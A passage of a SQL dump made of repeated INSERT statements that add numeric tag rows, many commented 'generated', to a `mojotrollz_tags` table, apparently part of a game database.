0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7288, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7288, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7288, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7288, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7288, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7290, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7290, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7290, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7291, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7291, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7291, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7292, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7292, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7294, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7295, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7295, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7296, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7297, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7297, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7297, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7297, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7298, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7307, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7307, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7307, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7307, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7308, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7308, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7308, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7308, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7309, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7309, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7310, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7310, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7310, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7310, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7312, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7312, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7313, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7313, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7315, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7316, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7318, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7319, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7320, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7320, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7320, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7321, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7321, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7321, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7323, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7324, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7325, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7327, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7327, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7327, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7328, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7328, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7328, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7329, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7329, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7329, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7332, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7332, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7332, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7333, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7333, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7334, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7334, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7335, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7335, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7335, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7337, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7337, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7337, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7340, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7341, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7341, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7341, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7342, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7342, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7342, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7343, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7343, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7344, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7344, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7345, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7345, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7345, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7346, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7346, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7347, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7347, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7347, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7348, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7348, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7348, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7351, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7352, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7352, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7352, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7353, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7353, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7353, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7354, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7354, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7354, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7355, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7356, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7357, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7357, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7357, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7358, 1, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7358, 1, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7358, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7361, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7363, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7365, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7369, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7370, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7371, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7372, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7379, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7381, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7382, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7389, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7390, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7395, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7395, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7395, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7395, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7396, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7396, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7397, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7397, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7404, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7405, 1, 1, 70, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7405, 1, 2, 1337, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7406, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7406, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7407, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7408, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7409, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7410, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7410, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7424, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7425, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7427, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7427, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7428, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7428, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7429, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7429, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7431, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, 